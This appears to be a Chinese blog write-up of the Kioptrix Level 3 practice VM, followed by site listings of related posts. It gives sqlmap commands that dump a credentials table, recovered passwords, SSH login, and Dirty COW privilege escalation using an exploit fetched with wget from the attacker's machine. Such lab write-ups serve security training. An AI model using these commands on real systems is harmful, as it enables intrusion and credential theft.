KioptrixVM3靶机复现

于 2024-07-30 21:38:53 发布
阅读量650 收藏 14
点赞数 19
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/140807392
版权

获取靶机IP

查看靶机MAC地址

发现靶机IP地址为192.168.112.144

目录扫描

发现http端口开放,进行目录扫描

dirsearch -u 192.168.112.144

浏览器访问

输入ip地址进行浏览器访问

点击now

随便点开几个,发现都跳转到了kioptrix3.com这个地址,改地址无法访问

尝试将kioptrix3.com替换成192.168.112.144,发现访问成功

目录拼接

拼接/phpmyadmin进入后台登陆页面

测试sql注入

进入该http://192.168.112.144/gallery/gallery.php?id=1&sort=photoid#photos地址

发现存在参数,进行sql注入测试

使用sqlmap测试 python -u http://192.168.112.144/gallery/gallery.php?id=1 --batch

测试成功,发现存在sql注入

因为有后台,大概率账号密码存在数据库中,查看数据库

python -u "http://192.168.112.144/gallery/gallery.php?id=1" --dbs --batch

查看表

python sqlmap.py -u "http://192.168.112.144/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables --batch

查看表中字段

python sqlmap.py -u "http://192.168.112.144/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts --columns --batch

查看表中内容

python sqlmap.py -u "http://192.168.112.144/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts -C username,password --dump --batch

发现两对账号密码

账号:dreg密码:Mast3r

账号:loneferret密码:starwars

进行后台登陆

发现两个账号密码都错误,后台登陆失败

ssh连接

因为后台登录失败,所以尝试使用扫到的ssh端口进行连接

输入ssh dreg@192.168.112.144

发现ssh连接成功

另一个账号也成功

进行提权

输入sudo -l

发现该用户没权限使用,切换用户loneferret

uname -a发现版本低于3.9,可以使用脏牛提权

使用searchspoilt "dirty cow"查找

输入searchspoilt -m linux/local/40839.c /home/kali/Desktop下载

再输入python -m http.server 8000开启远程服务

靶机输入wget http://kali的IP:8000/40839.c下载

输入./40839进行运行

登陆firefart用户

提权成功

CcHKer
关注
  • 19
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试-KioptrixVM3靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-02 2281
1.环境部署 靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar 攻击机:Kali 2019.2 amd64 靶机 : KioptrixVM3靶机 目标:拿下靶机root权限 2.信息收集 使用arp-scan -l进行局域网主机发现 得到靶机IP地址,使用Nmap进行端口扫描 nmap -sV 192.168.227.13...
KioptrixVM3-writeup
Lee
08-20 446
KioptrixVM3-writeup 0x00 信息收集 nmap -A -T4 -p 1-65535 16.16.16.180 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 15:16 CST
Vulnhub系列:kioptrixVM3
Fuzz
08-10 2498
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为OSCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 运行环境 kali:192.168.44.128 靶机:192.168.44.134 相关知识点 0x00、信息收集 主机发现:nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV 192.168.44.134 0
KioptrixVM3
cxyzupup的博客
01-10 1778
KioptrixVM3 项目地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24 提示:靶机网络连接方式使用NAT模式。 文章目录KioptrixVM3一、信息收集:1. 靶机IP查找:2. 使用nmap进行端口扫描:二、信息利用/系统提权1.枚举web服务:2. 访问gallery目录后未发现有用信息3. 对gallery目录进行再次枚举4. 在gallery目录下发现一个gallery.php文件,验证后发现该http下存在注入5. 通过注入获取
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Kioptrix Level 3 靶机wp
m0_52496313的博客
08-14 336
Kioptrix Level 3 靶机wp
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8450
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
厦门工学院在广东2021-2024各专业最低录取分数及位次表.pdf
最新发布
09-07
全国各大学在广东2021-2024各专业最低录取分数及位次表
基于深度学习的目标检测研究综述.pdf
09-07
基于深度学习的目标检测研究综述.pdf
3_9月6日 上午11点27分.m4a..mp3
09-07
3_9月6日 上午11点27分.m4a..mp3
2023-04-06-项目笔记 - 第二百四十九阶段 - 4.4.2.247全局变量的作用域-247 -2025.09.07
09-07
2023-04-06-项目笔记-第二百四十九阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.247局变量的作用域_247- 2024-09-07
ios系统资源管理知识详解
09-07
ios系统资源管理知识详解
常州大学在广东2021-2024各专业最低录取分数及位次表.pdf
09-07
全国各大学在广东2021-2024各专业最低录取分数及位次表
【前端】SpirngBoot+Mybatis+Vue在线考试系统前端代码(前后端分离项目).zip
09-07
【前端】SpirngBoot+Mybatis+Vue在线考试系统前端代码(前后端分离项目).zip 【前端】SpirngBoot+Mybatis+Vue在线考试系统前端代码(前后端分离项目).zip 【前端】SpirngBoot+Mybatis+Vue在线考试系统前端代码(前后端分离项目).zip 【前端】SpirngBoot+Mybatis+Vue在线考试系统前端代码(前后端分离项目).zip
成都市社区居家智慧养老综合体精准化服务体系研究-以荷花池街道社区养老服务综合体为例
09-07
 本研究聚焦如何解决成都市社区养老服务综合体精准化服务体系的问题?基于精准治理理论,结合智慧养老云平台和精准化服务体系,从数据驱动下精准识别对象和需求、平台资源整合驱动精准供给主体和内容、智慧养老云平台匹配供需提升精准管理水平、精准技术赋能和人才支持这四个维度构建分析框架,以成都市金牛区荷花池街道社区养老服务综合体为例,通过实地走访和访谈,结合政府公开数据资料和新闻报道,剖析该社区养老服务综合体精准化服务体系面临问题,研究发现主要存在以下问题:精准识别能力薄弱、精准供给网络建设滞后、平台运营和评估监管精准度低、养老服务支持不精准。基于分析框架的问题和原因分析,提出成都市社区养老服务综合体精准化服务体系的完善对策。主要从以下四个维度提出优化建议:(1)数据驱动:精准识别对象及需求,通过建立老年群体需求分析报告和信息数据库,精准采集老年群体的基础信息、健康信息、需求信息等。(2)资源整合:精准供给主体和内容,从政府、市场、社会组织等主体展开剖析,通过建立利益共同体,完善多元主体协同关系。(3)平台匹配:精准管理智慧养老服务信息平台,建立“端-网-云”架构和评估监管子系统精准供需匹配。
基于Java的客户管理系统源码,CRM 带小程序 CRM小程序源码 1. 前端:Vue 2. 后端:Spring boot
09-07
基于Java的客户管理系统源码,CRM 带小程序 CRM小程序源码 1. 前端:Vue 2. 后端:Spring boot 3. 数据库:MySQL 4.开发语言:Java CRM客户关系管理系统 客户全流程高效管理,包括客户资料管理,客户跟踪管理,订单 合同管理,回款及交付管理等功能。 后台功能展示: 1、系统管理:员工管理、角色管理、菜单管理、部门管理、岗位管理、字典管理、参数设置、日志管理 2、系统监控:在线用户、定时任务、数据监控、服务监控 3、系统工具:表单构建、代码生成、系统接口 4、平台配置:平台配置、公海规则配置 5、客户管理:公海客户、合同管理、我的客户、我的合同、回款管理 6、审批管理:客户审批、合同审批、回款审批 7、业绩管理:业绩目标、添加业绩目标 8、通讯录:全部员工信息(包括员工姓名、岗位、部门、手机号码) 9、产品管理:产品分类、产品管理 10、 日历:我的日程(包括日程提醒、休假、开会、出差) 11、 统计分析:公海客户分析、员工客户分析、客户跟进分析、合同金额分析、产品销售分析、客户销售分析
湖北大学知行学院在广东2021-2024各专业最低录取分数及位次表.pdf
09-07
全国各大学在广东2021-2024各专业最低录取分数及位次表
metasploitable3靶机安装
03-16
Metasploitable3 是一个用于渗透测试的虚拟机镜像,它包含了许多常见漏洞,可用于练习渗透测试技能。安装过程如下: 1. 下载 Metasploitable3 镜像文件 2. 使用虚拟机软件(如 VirtualBox)导入镜像文件 3. 启动虚拟机 4. 登录系统(用户名:msfadmin,密码:msfadmin) 注意:由于 Metasploitable3 包含了漏洞,请勿在生产环境中使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值